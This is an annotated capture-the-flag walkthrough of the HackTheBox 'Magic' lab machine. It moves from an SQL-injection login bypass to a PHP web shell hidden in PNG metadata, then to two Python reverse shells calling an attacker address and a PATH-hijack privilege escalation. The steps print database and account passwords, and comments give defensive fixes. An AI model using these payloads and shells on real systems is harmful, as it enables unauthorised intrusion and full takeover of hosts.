HackTheBox — Magic

CyberOPS by LittleDog
2 min read · May 16, 2020
# Walkthrough transcript for the HackTheBox "Magic" lab machine (10.10.10.185).
# It mixes attacker-side commands, browser URLs, one POST body and commands
# typed in the shell obtained on the target; it is not a runnable script.
# The notes name the weakness each step relies on and what would stop or reveal it.

# Recon: scan every TCP port (-p-) with default scripts (-sC) and service
# version detection (-sV).
nmap -sC -sV -p- 10.10.10.185
# Web application root and its login page.
http://10.10.10.185/
http://10.10.10.185/login.php
# Login form body. The stray quote plus the `or 1=1` tautology and trailing
# comment only work if the username is concatenated into the SQL text, i.e. an
# SQL-injection authentication bypass. Fix: parameterized queries / prepared
# statements. Detection: quotes and comment markers in the username field in
# web or WAF logs.
username=admin' or 1=1--+&password=password
# A PHP snippet is written into the PNG's Comment metadata, so the file is still
# a valid image; the rename then gives it a double extension.
# NOTE(review): the upload filter presumably checks only the final extension
# and/or the image header - confirm against the application's upload code.
# Defence: allowlist the whole file name, re-encode uploaded images (which
# drops metadata), and keep uploads outside the web root or in a directory
# where no script handler is enabled.
exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' test.png
mv test.png test.php.png
# The upload is served from /images/uploads/ and the `cmd` parameter is
# executed, so the server runs a file named *.php.png as PHP.
# NOTE(review): implies the PHP handler matches ".php" anywhere in the name -
# confirm in the web server configuration.
# Detection: requests with query strings to files in the uploads directory.
http://10.10.10.185/images/uploads/test.php.png?cmd=ls
# The same parameter is used to start an interactive shell connected outbound
# to 10.10.15.209:4443. Detection: the web-server account spawning python3 or
# /bin/sh, and outbound connections from the web server to unusual ports;
# egress filtering limits this step.
http://10.10.10.185/images/uploads/test.php.png?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.209",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Allocate a pseudo-terminal for the shell (interactive programs such as `su`
# need one).
python3 -c "import pty;pty.spawn('/bin/bash')"
# Application source directory; db.php5 presumably holds the database
# credentials used on the mysqldump line below. Keeping secrets out of files
# readable by the web-server account limits what a web compromise exposes.
cd /var/www/Magic
cat db.php5
# Dump the application database with those credentials. A password given as
# -p<value> on the command line is visible in the process list and in shell
# history.
mysqldump --databases Magic -utheseus -piamkingtheseus
# Switch to the local account `theseus`; the next line is the password typed
# at the prompt. It differs from the database password and presumably came out
# of the dump - if so, the application stores it in recoverable form and it is
# reused for the OS account. Defence: hash stored passwords and use distinct
# credentials per system.
su theseus
Th3s3usW4sK1ng
# User flag.
cat /home/theseus/user.txt

Privilege Escalation

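# Privilege escalation through PATH hijacking. The page had fused these
# commands onto a single line; they are restored one per line here with no
# other change to the commands.

# Work in a world-writable directory.
cd /tmp
touch fdisk
# Write a file named after the system tool `fdisk`; its content is a command
# that opens a shell connected to 10.10.15.209:4442.
echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.209",4442));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > fdisk
# Put /tmp first in the search path so a bare `fdisk` resolves to the file above.
export PATH=/tmp:$PATH
chmod 755 fdisk
# NOTE(review): the root flag read below implies `sysinfo` runs with elevated
# privileges (presumably setuid root) and calls `fdisk` by bare name, trusting
# the caller's PATH - confirm by inspecting the binary.
# Fix: privileged programs should call helpers by absolute path and reset PATH
# to a fixed value, or not be setuid at all.
# Detection: audit setuid binaries for relative command lookups; alert on
# executables created in /tmp that are named after system tools.
sysinfo
# Allocate a pseudo-terminal in the resulting shell.
python3 -c "import pty;pty.spawn('/bin/bash')"
# Root flag.
cat /root/root.txt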
